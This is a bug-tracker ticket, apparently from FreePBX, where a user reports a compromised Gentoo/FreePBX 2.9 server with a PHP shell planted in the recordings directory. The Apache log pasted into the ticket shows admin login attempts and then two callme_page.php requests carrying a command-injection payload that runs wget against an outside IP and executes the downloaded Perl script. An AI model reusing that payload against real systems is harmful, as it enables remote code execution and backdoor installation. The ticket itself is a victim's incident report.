id	summary	reporter	owner	description	type	status	priority	milestone	component	version	resolution	keywords	cc	confirmation	distro	engine	distro_ver	engine_version	svn_rev
5848	my system was compromized	a0d75		yesterday my system was compromised: phpshell scipt added to \r\n\r\n/var/www/localhost/htdocs/recordings/main.php\r\n\r\napache log information:\r\n\r\n\r\n{{{\r\n37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/logo.png HTTP/1.1" 200 8049\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/spacer.gif HTTP/1.1" 200 43\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146\r\n37.8.21.40 - - [21/May/2012:08:54:38 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283\r\n37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/js/libfreepbx.javascripts.js HTTP/1.1" 200 302944\r\n37.8.21.40 - - [21/May/2012:08:54:46 +0400] "GET /favicon.ico HTTP/1.1" 404 209\r\n37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin HTTP/1.1" 301 235\r\n37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/ HTTP/1.1" 302 -\r\n37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - freepbx [21/May/2012:08:55:20 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - admin [21/May/2012:08:55:26 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/script.js.php?load_version=2.9.0.10 HTTP/1.1" 200 1111\r\n37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.cookie.js HTTP/1.1" 200 4247\r\n37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911\r\n37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.toggleval.3.0.js HTTP/1.1" 200 3496\r\n37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/interface.dim.js HTTP/1.1" 200 3761\r\n37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594\r\n37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547\r\n37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/assets/js/tabber-minimized.js HTTP/1.1" 200 4904\r\n37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688\r\n37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696\r\n37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/images/favicon.ico HTTP/1.1" 200 318\r\n37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/ HTTP/1.1" 302 -\r\n37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - freepbx [21/May/2012:09:00:29 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - admin [21/May/2012:09:00:34 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - admin [21/May/2012:09:00:45 +0400] "GET /admin/config.php HTTP/1.1" 401 3034\r\n37.8.21.40 - - [21/May/2012:09:00:46 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911\r\n37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594\r\n37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547\r\n37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/freepbx_large.png?load_version=2.9.0.10 HTTP/1.1" 200 7590\r\n37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/logo.png?load_version=2.9.0.10 HTTP/1.1" 200 5699\r\n37.8.21.40 - - [21/May/2012:09:00:51 +0400] "GET /panel HTTP/1.1" 401 401\r\n37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696\r\n37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688\r\n37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155\r\n37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184\r\n37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354\r\n37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283\r\n37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043\r\n37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404\r\n37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146\r\n37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61\r\n37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /favicon.ico HTTP/1.1" 404 209\r\n37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209\r\n37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209\r\n37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127\r\n37.8.21.40 - - [21/May/2012:09:21:27 +0400] "GET /recordings/main.php HTTP/1.1" 404 217\r\n}}}\r\n\r\n\r\nmy system: Gentoo, FreePBX 2.9.0.10	Bugs	closed	minor	2.11	ARI	2.9-branch	invalid			Unreviewed		Asterisk 1.6